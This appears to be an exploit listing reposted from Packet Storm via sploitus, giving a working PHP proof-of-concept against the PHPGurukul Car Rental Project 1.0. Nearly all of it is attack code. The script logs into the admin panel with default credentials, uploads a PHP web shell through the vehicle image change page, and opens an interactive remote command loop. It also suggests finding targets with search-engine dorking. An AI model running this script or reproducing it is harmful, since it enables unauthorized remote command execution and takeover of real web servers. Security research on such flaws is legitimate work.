Share
## https://sploitus.com/exploit?id=PACKETSTORM:181761
=============================================================================================================================================
| # Title : Car Rental Project 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://phpgurukul.com/car-rental-project-php-mysql-free-download/ |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] This PHP code is designed to create a file and inject PHP code.
[+] save payload as poc.php
[+] usage : C:\www\test>php poc.php 127.0.0.1
[+] payload :
<?php
echo "
+-------------------------------------------------------------+
Car Rental Project v1.0 - php Code injection
by indoushka
+-------------------------------------------------------------+
";
// Function to log in and execute RCE
function login($rhosts) {
$session = curl_init();
$bigstring = "\n+-------------------------------------------------------------+\n";
echo "+-------------------------------------------------------------+\n";
echo "[+] Victim host: " . $rhosts . "\n";
$post_auth_login = "http://" . $rhosts . "/carrentalproject/carrental/admin/index.php";
$shell_upload_url = "http://" . $rhosts . "/carrentalproject/carrental/admin/changeimage1.php";
// Login / Authentication
$post_data = [
'username' => 'admin',
'password' => 'Test@12345',
'login' => ''
];
// Initiating a cURL request for login
curl_setopt($session, CURLOPT_URL, $post_auth_login);
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($session, CURLOPT_COOKIEFILE, "cookie.txt"); // Store cookies in a file
$login_response = curl_exec($session);
// Get the HTTP response code
$http_code = curl_getinfo($session, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Login HTTP response code: 200\n";
echo "[+] Successfully logged in\n";
} else {
echo "[!] Failed to authenticate\n";
exit;
}
// Proxy settings (optional, for Burp)
$proxies = [
"http" => "http://127.0.0.1:8080",
"https" => "http://127.0.0.1:8080"
];
// Data for uploading the backdoor
$backdoor_file = new CURLFile('1dccadfed7bcbb036c56a4afb97e906f.php', 'application/x-php', '<?php system($_GET["cmd"]); ?>');
$upload_data = [
'img1' => $backdoor_file,
'update' => ''
];
// Attempt to upload the PHP shell
curl_setopt($session, CURLOPT_URL, $shell_upload_url);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, $upload_data);
$upload_response = curl_exec($session);
if ($upload_response) {
echo "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" . $bigstring;
} else {
echo "[!] Failed to upload backdoor\n";
exit;
}
// Command Execution Loop
while (true) {
echo "Command RCE >> ";
$command = trim(fgets(STDIN));
$shell_location = "http://" . $rhosts . "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php?cmd=" . urlencode($command);
// Execute the command
curl_setopt($session, CURLOPT_URL, $shell_location);
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($session);
echo $response . "\n";
}
// Close cURL session
curl_close($session);
}
if ($argc < 2) {
echo "Usage: php script.php [target_host]\n";
exit;
}
// Call the login function with the provided host
login($argv[1]);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================